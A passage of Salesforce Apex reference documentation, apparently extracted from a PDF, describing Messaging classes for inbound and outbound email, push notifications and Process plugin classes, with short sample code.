replyTo
The email address that appears in the reply-to header.
subject
The subject line of the email, if any.
textAttachments
A list of text attachments received with the email, if any.
toAddresses
The email address that appears in the To field.
binaryAttachments
A list of binary attachments received with the email, if any.
Signature
public InboundEmail.BinaryAttachment[] binaryAttachments {get; set;}
Property Value
Type: InboundEmail.BinaryAttachment[]
Usage
Examples of binary attachments include image, audio, application, and video files.
1160
Reference
InboundEmail Class
ccAddresses
A list of carbon copy (CC) addresses, if any.
Signature
public String[] ccAddresses {get; set;}
Property Value
Type: String[]
fromAddress
The email address that appears in the From field.
Signature
public String fromAddress {get; set;}
Property Value
Type: String
fromName
The name that appears in the From field, if any.
Signature
public String fromName {get; set;}
Property Value
Type: String
headers
A list of the RFC 2822 headers in the email.
Signature
public InboundEmail.Header[] headers {get; set;}
Property Value
Type: InboundEmail.Header[]
Usage
The list of the RFC 2822 headers includes:
1161
Reference
InboundEmail Class
Recieved from
Custom headers
Message-ID
Date
htmlBody
The HTML version of the email, if specified by the sender.
Signature
public String htmlBody {get; set;}
Property Value
Type: String
htmlBodyIsTruncated
Indicates whether the HTML body text is truncated (true) or not (false.)
Signature
public Boolean htmlBodyIsTruncated {get; set;}
Property Value
Type: Boolean
inReplyTo
The In-Reply-To field of the incoming email. Identifies the email or emails to which this one is a reply (parent emails). Contains the parent
email or emails' message-IDs.
Signature
public String inReplyTo {get; set;}
Property Value
Type: String
messageId
The Message-IDthe incoming email's unique identifier.
Signature
public String messageId {get; set;}
1162
Reference
InboundEmail Class
Property Value
Type: String
plainTextBody
The plain text version of the email, if specified by the sender.
Signature
public String plainTextBody {get; set;}
Property Value
Type: String
plainTextBodyIsTruncated
Indicates whether the plain body text is truncated (true) or not (false.)
Signature
public Boolean plainTextBodyIsTruncated {get; set;}
Property Value
Type: Boolean
references
The References field of the incoming email. Identifies an email thread. Contains a list of the parent emails' References and message IDs,
and possibly the In-Reply-To fields.
Signature
public String[] references {get; set;}
Property Value
Type: String[]
replyTo
The email address that appears in the reply-to header.
Signature
public String replyTo {get; set;}
1163
Reference
InboundEmail Class
Property Value
Type: String
Usage
If there is no reply-to header, this field is identical to the fromAddress field.
subject
The subject line of the email, if any.
Signature
public String subject {get; set;}
Property Value
Type: String
textAttachments
A list of text attachments received with the email, if any.
Signature
public InboundEmail.TextAttachment[] textAttachments {get; set;}
Property Value
Type: InboundEmail.TextAttachment[]
Usage
The text attachments can be any of the following:
Attachments with a Multipurpose Internet Mail Extension (MIME) type of text
Attachments with a MIME type of application/octet-stream and a file name that ends with either a .vcf or .vcs
extension. These are saved as text/x-vcard and text/calendar MIME types, respectively.
toAddresses
The email address that appears in the To field.
Signature
public String[] toAddresses {get; set;}
Property Value
Type: String[]
1164
Reference
InboundEmail.BinaryAttachment Class
InboundEmail.BinaryAttachment Class
An InboundEmail object stores binary attachments in an InboundEmail.BinaryAttachment object.
Namespace
Messaging
Usage
Examples of binary attachments include image, audio, application, and video files.
IN THIS SECTION:
InboundEmail.BinaryAttachment Constructors
InboundEmail.BinaryAttachment Properties
InboundEmail.BinaryAttachment Constructors
The following are constructors for InboundEmail.BinaryAttachment.
IN THIS SECTION:
InboundEmail.BinaryAttachment()
Creates a new instance of the Messaging.InboundEmail.BinaryAttachment class.
InboundEmail.BinaryAttachment()
Creates a new instance of the Messaging.InboundEmail.BinaryAttachment class.
Signature
public InboundEmail.BinaryAttachment()
InboundEmail.BinaryAttachment Properties
The following are properties for InboundEmail.BinaryAttachment.
IN THIS SECTION:
body
The body of the attachment.
fileName
The name of the attached file.
headers
Any header values associated with the attachment. Examples of header names include Content-Type,
Content-Transfer-Encoding, and Content-ID.
1165
Reference
InboundEmail.BinaryAttachment Class
mimeTypeSubType
The primary and sub MIME-type.
body
The body of the attachment.
Signature
public Blob body {get; set;}
Property Value
Type: Blob
fileName
The name of the attached file.
Signature
public String fileName {get; set;}
Property Value
Type: String
headers
Any header values associated with the attachment. Examples of header names include Content-Type,
Content-Transfer-Encoding, and Content-ID.
Signature
public List<Messaging.InboundEmail.Header> headers {get; set;}
Property Value
Type: List<Messaging.InboundEmail.Header>
mimeTypeSubType
The primary and sub MIME-type.
Signature
public String mimeTypeSubType {get; set;}
Property Value
Type: String
1166
Reference
InboundEmail.TextAttachment Class
InboundEmail.TextAttachment Class
An InboundEmail object stores text attachments in an InboundEmail.TextAttachment object.
Namespace
Messaging
Usage
The text attachments can be any of the following:
Attachments with a Multipurpose Internet Mail Extension (MIME) type of text
Attachments with a MIME type of application/octet-stream and a file name that ends with either a .vcf or .vcs
extension. These are saved as text/x-vcard and text/calendar MIME types, respectively.
IN THIS SECTION:
InboundEmail.TextAttachment Constructors
InboundEmail.TextAttachment Properties
InboundEmail.TextAttachment Constructors
The following are constructors for InboundEmail.TextAttachment.
IN THIS SECTION:
InboundEmail.TextAttachment()
Creates a new instance of the Messaging.InboundEmail.TextAttachment class.
InboundEmail.TextAttachment()
Creates a new instance of the Messaging.InboundEmail.TextAttachment class.
Signature
public InboundEmail.TextAttachment()
InboundEmail.TextAttachment Properties
The following are properties for InboundEmail.TextAttachment.
IN THIS SECTION:
body
The body of the attachment.
bodyIsTruncated
Indicates whether the attachment body text is truncated (true) or not (false.)
1167
Reference
InboundEmail.TextAttachment Class
charset
The original character set of the body field. The body is re-encoded as UTF-8 as input to the Apex method.
fileName
The name of the attached file.
headers
Any header values associated with the attachment. Examples of header names include Content-Type,
Content-Transfer-Encoding, and Content-ID.
mimeTypeSubType
The primary and sub MIME-type.
body
The body of the attachment.
Signature
public String body {get; set;}
Property Value
Type: String
bodyIsTruncated
Indicates whether the attachment body text is truncated (true) or not (false.)
Signature
public Boolean bodyIsTruncated {get; set;}
Property Value
Type: Boolean
charset
The original character set of the body field. The body is re-encoded as UTF-8 as input to the Apex method.
Signature
public String charset {get; set;}
Property Value
Type: String
fileName
The name of the attached file.
1168
Reference
InboundEmailResult Class
Signature
public String fileName {get; set;}
Property Value
Type: String
headers
Any header values associated with the attachment. Examples of header names include Content-Type,
Content-Transfer-Encoding, and Content-ID.
Signature
public List<Messaging.InboundEmail.Header> headers {get; set;}
Property Value
Type: List<Messaging.InboundEmail.Header>
mimeTypeSubType
The primary and sub MIME-type.
Signature
public String mimeTypeSubType {get; set;}
Property Value
Type: String
InboundEmailResult Class
The InboundEmailResult object is used to return the result of the email service. If this object is null, the result is assumed to be successful.
Namespace
Messaging
InboundEmailResult Properties
The following are properties for InboundEmailResult.
IN THIS SECTION:
message
A message that Salesforce returns in the body of a reply email. This field can be populated with text irrespective of the value returned
by the Success field.
1169
Reference
InboundEnvelope Class
success
A value that indicates whether the email was successfully processed.
message
A message that Salesforce returns in the body of a reply email. This field can be populated with text irrespective of the value returned
by the Success field.
Signature
public String message {get; set;}
Property Value
Type: String
success
A value that indicates whether the email was successfully processed.
Signature
public Boolean success {get; set;}
Property Value
Type: Boolean
Usage
If false, Salesforce rejects the inbound email and sends a reply email to the original sender containing the message specified in the
Message field.
InboundEnvelope Class
The InboundEnvelope object stores the envelope information associated with the inbound email, and has the following fields.
Namespace
Messaging
InboundEnvelope Properties
The following are properties for InboundEnvelope.
IN THIS SECTION:
fromAddress
The name that appears in the From field of the envelope, if any.
1170
Reference
MassEmailMessage Class
toAddress
The name that appears in the To field of the envelope, if any.
fromAddress
The name that appears in the From field of the envelope, if any.
Signature
public String fromAddress {get; set;}
Property Value
Type: String
toAddress
The name that appears in the To field of the envelope, if any.
Signature
public String toAddress {get; set;}
Property Value
Type: String
MassEmailMessage Class
Contains methods for sending mass email.
Namespace
Messaging
Usage
All base email (Email class) methods are also available to the MassEmailMessage objects.
IN THIS SECTION:
MassEmailMessage Constructors
MassEmailMessage Methods
SEE ALSO:
Email Class (Base Email Methods)
1171
Reference
MassEmailMessage Class
MassEmailMessage Constructors
The following are constructors for MassEmailMessage.
IN THIS SECTION:
MassEmailMessage()
Creates a new instance of the Messaging.MassEmailMessage class.
MassEmailMessage()
Creates a new instance of the Messaging.MassEmailMessage class.
Signature
public MassEmailMessage()
MassEmailMessage Methods
The following are methods for MassEmailMessage. All are instance methods.
IN THIS SECTION:
setDescription(String)
The description of the email.
setTargetObjectIds(ID[])
A list of IDs of the contacts, leads, or users to which the email will be sent. The IDs you specify set the context and ensure that merge
fields in the template contain the correct data. The objects must be of the same type (all contacts, all leads, or all users).
setWhatIds(ID[])
Optional. If you specify a list of contacts for the targetObjectIds field, you can specify a list of whatIds as well. This helps
to further ensure that merge fields in the template contain the correct data.
setDescription(String)
The description of the email.
Signature
public Void setDescription(String description)
Parameters
description
Type: String
Return Value
Type: Void
1172
Reference
MassEmailMessage Class
setTargetObjectIds(ID[])
A list of IDs of the contacts, leads, or users to which the email will be sent. The IDs you specify set the context and ensure that merge
fields in the template contain the correct data. The objects must be of the same type (all contacts, all leads, or all users).
Signature
public Void setTargetObjectIds(ID[] targetObjectIds)
Parameters
targetObjectIds
Type: ID[]
Return Value
Type: Void
Usage
You can list up to 250 IDs per email. If you specify a value for the targetObjectIds field, optionally specify a whatId as well to
set the email context to a user, contact, or lead. This ensures that merge fields in the template contain the correct data.
Do not specify the IDs of records that have the Email Opt Out option selected.
All email must have a recipient value of at least one of the following:
toAddresses
ccAddresses
bccAddresses
targetObjectId
targetObjectIds
setWhatIds(ID[])
Optional. If you specify a list of contacts for the targetObjectIds field, you can specify a list of whatIds as well. This helps to
further ensure that merge fields in the template contain the correct data.
Signature
public Void setWhatIds(ID[] whatIds)
Parameters
whatIds
Type: ID[]
Return Value
Type: Void
1173
Reference
InboundEmail.Header Class
Usage
The values must be one of the following types:
Contract
Case
Opportunity
Product
Note: If you specify whatIds, specify one for each targetObjectId; otherwise, you will receive an INVALID_ID_FIELD
error.
InboundEmail.Header Class
An InboundEmail object stores RFC 2822 email header information in an InboundEmail.Header object with the following properties.
Namespace
Messaging
InboundEmail.Header Properties
The following are properties for InboundEmail.Header.
IN THIS SECTION:
name
The name of the header parameter, such as Date or Message-ID.
value
The value of the header.
name
The name of the header parameter, such as Date or Message-ID.
Signature
public String name {get; set;}
Property Value
Type: String
value
The value of the header.
Signature
public String value {get; set;}
1174
Reference
PushNotification Class
Property Value
Type: String
PushNotification Class
PushNotification is used to configure push notifications and send them from an Apex trigger.
Namespace
Messaging
Example
This sample Apex trigger sends push notifications to the connected app named Test_App, which corresponds to a mobile app on
iOS mobile clients. The trigger fires after cases have been updated and sends the push notification to two users: the case owner and the
user who last modified the case.
trigger caseAlert on Case (after update) {
for(Case cs : Trigger.New)
{
// Instantiating a notification
Messaging.PushNotification msg =
new Messaging.PushNotification();
// Assembling the necessary payload parameters for Apple.
// Apple params are:
// (<alert text>,<alert sound>,<badge count>,
// <free-form data>)
// This example doesn't use badge count or free-form data.
// The number of notifications that haven't been acted
// upon by the intended recipient is best calculated
// at the time of the push. This timing helps
// ensure accuracy across multiple target devices.
Map<String, Object> payload =
Messaging.PushNotificationPayload.apple(
'Case ' + cs.CaseNumber + ' status changed to: '
+ cs.Status, '', null, null);
// Adding the assembled payload to the notification
msg.setPayload(payload);
// Getting recipient users
String userId1 = cs.OwnerId;
String userId2 = cs.LastModifiedById;
// Adding recipient users to list
Set<String> users = new Set<String>();
users.add(userId1);
users.add(userId2);
// Sending the notification to the specified app and users.
1175
Reference
PushNotification Class
IN THIS SECTION:
PushNotification Constructors
PushNotification Methods
PushNotification Constructors
The following are the constructors for PushNotification.
IN THIS SECTION:
PushNotification()
Creates a new instance of the Messaging.PushNotification class.
PushNotification(Map<String, Object> payload)
Creates a new instance of the Messaging.PushNotification class using the specified payload parameters as key-value
pairs. When you use this constructor, you dont need to call setPayload to set the payload.
PushNotification()
Creates a new instance of the Messaging.PushNotification class.
Signature
public PushNotification()
Signature
public PushNotification(Map<String, Object> payload)
Parameters
payload
Type:Map<String, Object>
The payload, expressed as a map of key-value pairs.
PushNotification Methods
The following are the methods for PushNotification. All are global methods.
1176
Reference
PushNotification Class
IN THIS SECTION:
send(String application, Set<String> users)
Sends a push notification message to the specified users.
setPayload(Map<String, Object> payload)
Sets the payload of the push notification message.
setTtl(Integer ttl)
Reserved for future use.
Signature
public void send(String application, Set<String> users)
Parameters
application
Type: String
The connected app API name. This corresponds to the mobile client app the notification should be sent to.
users
Type: Set
A set of user IDs that correspond to the users the notification should be sent to.
Example
See the Push Notification Example.
Signature
public void setPayload(Map<String, Object> payload)
Parameters
payload
1177
Reference
PushNotificationPayload Class
Example
See the Push Notification Example.
setTtl(Integer ttl)
Reserved for future use.
Signature
public void setTtl(Integer ttl)
Parameters
ttl
Type: Integer
Reserved for future use.
PushNotificationPayload Class
Contains methods to create the notification message payload for an Apple device.
Namespace
Messaging
Usage
Apple has specific requirements for the notification payload. and this class has helper methods to create the payload. For more information
on Apples payload parameters, search for Apple Push Notification Service at https://developer.apple.com/library/mac/documentation/.
Example
See the Push Notification Example.
IN THIS SECTION:
PushNotificationPayload Methods
PushNotificationPayload Methods
The following are the methods for PushNotificationPayload. All are global static methods.
IN THIS SECTION:
apple(String alert, String sound, Integer badgeCount, Map<String, Object> userData)
Helper method that creates a valid Apple payload from the specified arguments.
1178
Reference
PushNotificationPayload Class
apple(String alertBody, String actionLocKey, String locKey, String[] locArgs, String launchImage, String sound, Integer badgeCount,
Map<String, Object> userData)
Helper method that creates a valid Apple payload from the specified arguments.
Signature
public static Map<String, Object> apple(String alert, String sound, Integer badgeCount,
Map<String, Object> userData)
Parameters
alert
Type: String
Notification message to be sent to the mobile client.
sound
Type: String
Name of a sound file to be played as an alert. This sound file should be in the mobile application bundle.
badgeCount
Type: Integer
Number to display as the badge of the application icon.
userData
Return Value
Type:Map<String, Object>
Returns a formatted payload that includes all of the specified arguments.
Usage
To generate a valid payload, you must provide a value for at least one of the following parameters: alert, sound, badgeCount.
Example
See the Push Notification Example.
apple(String alertBody, String actionLocKey, String locKey, String[] locArgs, String launchImage,
String sound, Integer badgeCount, Map<String, Object> userData)
Helper method that creates a valid Apple payload from the specified arguments.
1179
Reference
PushNotificationPayload Class
Signature
public static Map<String, Object> apple(String alertBody, String actionLocKey, String
locKey, String[] locArgs, String launchImage, String sound, Integer badgeCount,
Map<String, Object> userData)
Parameters
alertBody
Type: String
Text of the alert message.
actionLocKey
Type: String
If a value is specified for the actionLocKey argument, an alert with two buttons is displayed. The value is a key to get a localized
string in a Localizable.strings file to use for the right buttons title.
locKey
Type: String
Key to an alert-message string in a Localizable.strings file for the current localization.
locArgs
Type: List<String>
Variable string values to appear in place of the format specifiers in locKey.
launchImage
Type: String
File name of an image file in the application bundle.
sound
Type: String
Name of a sound file to be played as an alert. This sound file should be in the mobile application bundle.
badgeCount
Type: Integer
Number to display as the badge of the application icon.
userData
Return Value
Type: Map<String, Object>
Returns a formatted payload that includes all of the specified arguments.
Usage
To generate a valid payload, you must provide a value for at least one of the following parameters: alert, sound, badgeCount.
1180
Reference
SendEmailError Class
SendEmailError Class
Represents an error that the SendEmailResult object may contain.
Namespace
Messaging
SendEmailError Methods
The following are methods for SendEmailError. All are instance methods.
IN THIS SECTION:
getFields()
A list of one or more field names. Identifies which fields in the object, if any, affected the error condition.
getMessage()
The text of the error message.
getStatusCode()
Returns a code that characterizes the error.
getTargetObjectId()
The ID of the target record for which the error occurred.
getFields()
A list of one or more field names. Identifies which fields in the object, if any, affected the error condition.
Signature
public String[] getFields()
Return Value
Type: String[]
getMessage()
The text of the error message.
Signature
public String getMessage()
Return Value
Type: String
1181
Reference
SendEmailResult Class
getStatusCode()
Returns a code that characterizes the error.
Signature
public System.StatusCode getStatusCode()
Return Value
Type: System.StatusCode
Usage
The full list of status codes is available in the WSDL file for your organization. For more information about accessing the WSDL file for
your organization, see Downloading Salesforce WSDLs and Client Authentication Certificates in the Salesforce online help.
getTargetObjectId()
The ID of the target record for which the error occurred.
Signature
public String getTargetObjectId()
Return Value
Type: String
SendEmailResult Class
Contains the result of sending an email message.
Namespace
Messaging
SendEmailResult Methods
The following are methods for SendEmailResult. All are instance methods.
IN THIS SECTION:
getErrors()
If an error occurred during the sendEmail method, a SendEmailError object is returned.
isSuccess()
Indicates whether the email was successfully submitted for delivery (true) or not (false). Even if isSuccess is true, it does
not mean the intended recipients received the email, as there could have been a problem with the email address or it could have
bounced or been blocked by a spam blocker.
1182
Reference
SingleEmailMessage Methods
getErrors()
If an error occurred during the sendEmail method, a SendEmailError object is returned.
Signature
public SendEmailError[] getErrors()
Return Value
Type: Messaging.SendEmailError[]
isSuccess()
Indicates whether the email was successfully submitted for delivery (true) or not (false). Even if isSuccess is true, it does not
mean the intended recipients received the email, as there could have been a problem with the email address or it could have bounced
or been blocked by a spam blocker.
Signature
public Boolean isSuccess()
Return Value
Type: Boolean
SingleEmailMessage Methods
Contains methods for sending single email messages.
Namespace
Messaging
Usage
All base email (Email class) methods are also available to the SingleEmailMessage objects.
IN THIS SECTION:
SingleEmailMessage Constructors
SingleEmailMessage Methods
SEE ALSO:
Email Class (Base Email Methods)
SingleEmailMessage Constructors
The following are constructors for SingleEmailMessage.
1183
Reference
SingleEmailMessage Methods
IN THIS SECTION:
SingleEmailMessage()
Creates a new instance of the Messaging.SingleEmailMessage class.
SingleEmailMessage()
Creates a new instance of the Messaging.SingleEmailMessage class.
Signature
public SingleEmailMessage()
SingleEmailMessage Methods
The following are methods for SingleEmailMessage. All are instance methods.
IN THIS SECTION:
setBccAddresses(String[])
Optional. A list of blind carbon copy (BCC) addresses. The maximum allowed is 25. This argument is allowed only when a template
is not used.
setCcAddresses(String[])
Optional. A list of carbon copy (CC) addresses. The maximum allowed is 25. This argument is allowed only when a template is not
used.
setCharset(String)
Optional. The character set for the email. If this value is null, the user's default value is used.
setDocumentAttachments(ID[])
Optional. A list containing the ID of each document object you want to attach to the email.
setFileAttachments(EmailFileAttachment[])
Optional. A list containing the file names of the binary and text files you want to attach to the email.
setHtmlBody(String)
Optional. The HTML version of the email, specified by the sender. The value is encoded according to the specification associated
with the organization. You must specify a value for setTemplateId, setHtmlBody, or setPlainTextBody. Or, you
can define both setHtmlBody and setPlainTextBody.
setInReplyTo(String)
Optional. The In-Reply-To field of the outgoing email. Identifies the email or emails to which this one is a reply (parent emails).
Contains the parent email or emails' message-IDs.
setPlainTextBody(String)
Optional. The text version of the email, specified by the sender. You must specify a value for setTemplateId, setHtmlBody,
or setPlainTextBody. Or, you can define both setHtmlBody and setPlainTextBody.
setOrgWideEmailAddressId(ID)
Optional. The ID of the organization-wide email address associated with the outgoing email. The object's DisplayName field
cannot be set if the setSenderDisplayName field is already set.
1184
Reference
SingleEmailMessage Methods
setReferences(String)
Optional. The References field of the outgoing email. Identifies an email thread. Contains the parent emails' References and message
IDs, and possibly the In-Reply-To fields.
setSubject(String)
Optional. The email subject line. If you are using an email template, the subject line of the template overrides this value.
setTargetObjectId(ID)
Required if using a template, optional otherwise. The ID of the contact, lead, or user to which the email will be sent. The ID you
specify sets the context and ensures that merge fields in the template contain the correct data.
setToAddresses(String[])
Optional. A list of email addresses to which you are sending the email. The maximum number of email addresses allowed is 100.
This argument is allowed only when a template is not used.
setWhatId(ID)
Optional. If you specify a contact for the targetObjectId field, you can specify a whatId as well. This helps to further ensure
that merge fields in the template contain the correct data.
setBccAddresses(String[])
Optional. A list of blind carbon copy (BCC) addresses. The maximum allowed is 25. This argument is allowed only when a template is
not used.
Signature
public Void setBccAddresses(String[] bccAddresses)
Parameters
bccAddresses
Type: String[]
Return Value
Type: Void
Usage
At least one value must be specified in one of the following fields: toAddresses, ccAddresses, bccAddresses,
targetObjectId, or targetObjectIds.
If the BCC compliance option is set at the organization level, the user cannot add BCC addresses on standard messages. The following
error code is returned: BCC_NOT_ALLOWED_IF_BCC_ COMPLIANCE_ENABLED. Contact your Salesforce representative for
information on BCC compliance.
setCcAddresses(String[])
Optional. A list of carbon copy (CC) addresses. The maximum allowed is 25. This argument is allowed only when a template is not used.
Signature
public Void setCcAddresses(String[] ccAddresses)
1185
Reference
SingleEmailMessage Methods
Parameters
ccAddresses
Type: String[]
Return Value
Type: Void
Usage
All email must have a recipient value of at least one of the following:
toAddresses
ccAddresses
bccAddresses
targetObjectId
targetObjectIds
setCharset(String)
Optional. The character set for the email. If this value is null, the user's default value is used.
Signature
public Void setCharset(String charset)
Parameters
charset
Type: String
Return Value
Type: Void
setDocumentAttachments(ID[])
Optional. A list containing the ID of each document object you want to attach to the email.
Signature
public Void setDocumentAttachments(ID[] docAttachments)
Parameters
docAttachments
Type: ID[]
1186
Reference
SingleEmailMessage Methods
Return Value
Type: Void
Usage
You can attach multiple documents as long as the total size of all attachments does not exceed 10 MB.
setFileAttachments(EmailFileAttachment[])
Optional. A list containing the file names of the binary and text files you want to attach to the email.
Signature
public Void setFileAttachments(EmailFileAttachment[] fileAttachments)
Parameters
fileAttachments
Type: Messaging.EmailFileAttachment[]
Return Value
Type: Void
Usage
You can attach multiple files as long as the total size of all attachments does not exceed 10 MB.
setHtmlBody(String)
Optional. The HTML version of the email, specified by the sender. The value is encoded according to the specification associated with
the organization. You must specify a value for setTemplateId, setHtmlBody, or setPlainTextBody. Or, you can define
both setHtmlBody and setPlainTextBody.
Signature
public Void setHtmlBody(String htmlBody)
Parameters
htmlBody
Type: String
Return Value
Type: Void
1187
Reference
SingleEmailMessage Methods
setInReplyTo(String)
Optional. The In-Reply-To field of the outgoing email. Identifies the email or emails to which this one is a reply (parent emails). Contains
the parent email or emails' message-IDs.
Signature
public Void setInReplyTo(String inReplyTo)
Parameters
inReplyTo
Type: String
Return Value
Type: Void
setPlainTextBody(String)
Optional. The text version of the email, specified by the sender. You must specify a value for setTemplateId, setHtmlBody, or
setPlainTextBody. Or, you can define both setHtmlBody and setPlainTextBody.
Signature
public Void setPlainTextBody(String plainTextBody)
Parameters
plainTextBody
Type: String
Return Value
Type: Void
setOrgWideEmailAddressId(ID)
Optional. The ID of the organization-wide email address associated with the outgoing email. The object's DisplayName field cannot
be set if the setSenderDisplayName field is already set.
Signature
public Void setOrgWideEmailAddressId(ID emailAddressId)
Parameters
emailAddressId
Type: ID
1188
Reference
SingleEmailMessage Methods
Return Value
Type: Void
setReferences(String)
Optional. The References field of the outgoing email. Identifies an email thread. Contains the parent emails' References and message
IDs, and possibly the In-Reply-To fields.
Signature
public Void setReferences(String references)
Parameters
references
Type: String
Return Value
Type: Void
setSubject(String)
Optional. The email subject line. If you are using an email template, the subject line of the template overrides this value.
Signature
public Void setSubject(String subject)
Parameters
subject
Type: String
Return Value
Type: Void
setTargetObjectId(ID)
Required if using a template, optional otherwise. The ID of the contact, lead, or user to which the email will be sent. The ID you specify
sets the context and ensures that merge fields in the template contain the correct data.
Signature
public Void setTargetObjectId(ID targetObjectId)
1189
Reference
SingleEmailMessage Methods
Parameters
targetObjectId
Type: ID
Return Value
Type: Void
Usage
Do not specify the IDs of records that have the Email Opt Out option selected.
All email must have a recipient value of at least one of the following:
toAddresses
ccAddresses
bccAddresses
targetObjectId
targetObjectIds
setToAddresses(String[])
Optional. A list of email addresses to which you are sending the email. The maximum number of email addresses allowed is 100. This
argument is allowed only when a template is not used.
Signature
public Void setToAddresses(String[] toAddresses)
Parameters
toAddresses
Type: String[]
Return Value
Type: Void
Usage
All email must have a recipient value of at least one of the following:
toAddresses
ccAddresses
bccAddresses
targetObjectId
targetObjectIds
1190
Reference
Process Namespace
setWhatId(ID)
Optional. If you specify a contact for the targetObjectId field, you can specify a whatId as well. This helps to further ensure
that merge fields in the template contain the correct data.
Signature
public Void setWhatId(ID whatId)
Parameters
whatId
Type: ID
Return Value
Type: Void
Usage
The value must be one of the following types:
Account
Asset
Campaign
Case
Contract
Opportunity
Order
Product
Solution
Custom
Process Namespace
The Process namespace provides an interface and classes for pass data between your organization and a flow.
The following are the interfaces and classes in the Process namespace.
IN THIS SECTION:
Plugin Interface
Allows you to pass data between your organization and a specified flow.
PluginDescribeResult Class
Describes the input and output parameters for Process.PluginResult.
PluginDescribeResult.InputParameter Class
Describes the input parameter for Process.PluginResult.
1191
Reference
Plugin Interface
PluginDescribeResult.OutputParameter Class
Describes the output parameter for Process.PluginResult.
PluginRequest Class
Passes input parameters from the class that implements the Process.Plugin interface to the flow.
PluginResult Class
Returns output parameters from the class that implements the Process.Plugin interface to the flow.
Plugin Interface
Allows you to pass data between your organization and a specified flow.
Namespace
Process
IN THIS SECTION:
Plugin Methods
Plugin Example Implementation
Plugin Methods
The following are instance methods for Plugin.
IN THIS SECTION:
describe()
Returns a Process.PluginDescribeResult object that describes this method call.
invoke(Process.PluginRequest)
Primary method that the system invokes when the class that implements the interface is instantiated.
describe()
Returns a Process.PluginDescribeResult object that describes this method call.
Signature
public Process.PluginDescribeResult describe()
Return Value
Type: Process.PluginDescribeResult
invoke(Process.PluginRequest)
Primary method that the system invokes when the class that implements the interface is instantiated.
1192
Reference
Plugin Interface
Signature
public Process.PluginResult invoke(Process.PluginRequest request)
Parameters
request
Type: Process.PluginRequest
Return Value
Type: Process.PluginResult
1193
Reference
PluginDescribeResult Class
Test Class
The following is a test class for the above class.
@isTest
private class flowChatTest {
static testmethod void flowChatTests() {
flowChat plugin = new flowChat();
Map<String,Object> inputParams = new Map<String,Object>();
string feedSubject = 'Flow is alive';
InputParams.put('subject', feedSubject);
Process.PluginRequest request = new Process.PluginRequest(inputParams);
plugin.invoke(request);
}
}
PluginDescribeResult Class
Describes the input and output parameters for Process.PluginResult.
Namespace
Process
IN THIS SECTION:
PluginDescribeResult Constructors
PluginDescribeResult Properties
PluginDescribeResult Constructors
The following are constructors for PluginDescribeResult.
IN THIS SECTION:
PluginDescribeResult()
Creates a new instance of the Process.PluginDescribeResult class.
PluginDescribeResult()
Creates a new instance of the Process.PluginDescribeResult class.
1194
Reference
PluginDescribeResult Class
Signature
public PluginDescribeResult()
PluginDescribeResult Properties
The following are properties for PluginDescribeResult.
IN THIS SECTION:
Description
This optional field describes the purpose of the plug-in.
InputParameters
The input parameters passed by the Process.PluginRequest class from a flow to the class that implements the
Process.Plugin interface.
Name
Unique name of the plug-in.
OutputParameters
The output parameters passed by the Process.PluginResult class from the class that implements the Process.Plugin
interface to the flow.
Tag
With this optional field, you can group plug-ins by tag name so they appear together in the Apex plug-in section of the Palette
within the Flow Designer. This is helpful if you have multiple plug-ins in your flow.
Description
This optional field describes the purpose of the plug-in.
Signature
public String Description {get; set;}
Property Value
Type: String
Usage
Size limit: 255 characters.
InputParameters
The input parameters passed by the Process.PluginRequest class from a flow to the class that implements the
Process.Plugin interface.
Signature
public List<Process.PluginDescribeResult.InputParameter> InputParameters {get; set;}
1195
Reference
PluginDescribeResult Class
Property Value
Type: List<Process.PluginDescribeResult.InputParameter>
Name
Unique name of the plug-in.
Signature
public String Name {get; set;}
Property Value
Type: String
Usage
Size limit: 40 characters.
OutputParameters
The output parameters passed by the Process.PluginResult class from the class that implements the Process.Plugin
interface to the flow.
Signature
public List<Process.PluginDescribeResult.OutputParameter> OutputParameters {get; set;}
Property Value
Type: List<Process.PluginDescribeResult.OutputParameter>
Tag
With this optional field, you can group plug-ins by tag name so they appear together in the Apex plug-in section of the Palette within
the Flow Designer. This is helpful if you have multiple plug-ins in your flow.
Signature
public String Tag {get; set;}
Property Value
Type: String
Usage
Size limit: 40 characters.
1196
Reference
PluginDescribeResult.InputParameter Class
PluginDescribeResult.InputParameter Class
Describes the input parameter for Process.PluginResult.
Namespace
Process
IN THIS SECTION:
PluginDescribeResult.InputParameter Constructors
PluginDescribeResult.InputParameter Properties
PluginDescribeResult.InputParameter Constructors
The following are constructors for PluginDescribeResult.InputParameter.
IN THIS SECTION:
PluginDescribeResult.InputParameter(String, String, Process.PluginDescribeResult.ParameterType, Boolean)
Creates a new instance of the Process.PluginDescribeResult.InputParameter class using the specified name,
description, parameter type, and required option.
PluginDescribeResult.InputParameter(String, Process.PluginDescribeResult.ParameterType, Boolean)
Creates a new instance of the Process.PluginDescribeResult.InputParameter class using the specified name,
parameter type, and required option.
Signature
public PluginDescribeResult.InputParameter(String name, String description,
Process.PluginDescribeResult.ParameterType parameterType, Boolean required)
Parameters
name
Type: String
Unique name of the plug-in.
description
Type: String
Describes the purpose of the plug-in.
parameterType
Type: Process.PluginDescribeResult.ParameterType
1197
Reference
PluginDescribeResult.InputParameter Class
Type: Boolean
Set to true for required and false otherwise.
Signature
public PluginDescribeResult.InputParameter(String name,
Process.PluginDescribeResult.ParameterType parameterType, Boolean required)
Parameters
name
Type: String
Unique name of the plug-in.
parameterType
Type: Process.PluginDescribeResult.ParameterType
The data type of the input parameter.
required
Type: Boolean
Set to true for required and false otherwise.
PluginDescribeResult.InputParameter Properties
The following are properties for PluginDescribeResult.InputParameter.
IN THIS SECTION:
Description
This optional field describes the purpose of the plug-in.
Name
Unique name of the plug-in.
ParameterType
The data type of the input parameter.
Required
Set to true for required and false otherwise.
Description
This optional field describes the purpose of the plug-in.
1198
Reference
PluginDescribeResult.InputParameter Class
Signature
public String Description {get; set;}
Property Value
Type: String
Usage
Size limit: 255 characters.
Name
Unique name of the plug-in.
Signature
public String Name {get; set;}
Property Value
Type: String
Usage
Size limit: 40 characters.
ParameterType
The data type of the input parameter.
Signature
public Process.PluginDescribeResult.ParameterType ParameterType {get; set;}
Property Value
Type: Process.PluginDescribeResult.ParameterType
Required
Set to true for required and false otherwise.
Signature
public Boolean Required {get; set;}
Property Value
Type: Boolean
1199
Reference
PluginDescribeResult.OutputParameter Class
PluginDescribeResult.OutputParameter Class
Describes the output parameter for Process.PluginResult.
Namespace
Process
IN THIS SECTION:
PluginDescribeResult.OutputParameter Constructors
PluginDescribeResult.OutputParameter Properties
PluginDescribeResult.OutputParameter Constructors
The following are constructors for PluginDescribeResult.OutputParameter.
IN THIS SECTION:
